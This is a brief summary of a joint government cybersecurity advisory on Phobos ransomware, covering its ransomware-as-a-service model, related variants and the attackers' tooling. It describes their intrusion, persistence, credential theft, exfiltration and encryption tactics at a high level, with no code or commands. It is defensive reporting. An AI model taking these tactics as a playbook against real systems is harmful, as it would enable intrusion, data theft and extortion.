StopRansomware Phobos Ransomware CISA AA24-060A
The FBI CISA and MS-ISAC have jointly released a Cybersecurity Advisory to share information on the Phobos ransomware variants observed as recently as February 2024. Phobos operates as a ransomware-as-a-service (RaaS) model and is likely connected to multiple variants like Elking Eight Devos Backmydata and Faust ransomware. It utilizes various open source tools such as Smokeloader Cobalt Strike and Bloodhound. Phobos actors gain initial access through phishing campaigns or by exploiting vulnerable Remote Desktop Protocol ports. They deploy hidden payloads modify firewall configurations and establish persistence using Windows Startup folders and Run Registry Keys. Additionally they employ tools like Mimikatz and NirSoft for credential enumeration and WinSCP and Mega.io for file exfiltration. Phobos encrypts user files deletes volume shadow copies and encrypts all connected logical drives. Each Phobos executable has unique identifiers and a ransom note embedded within.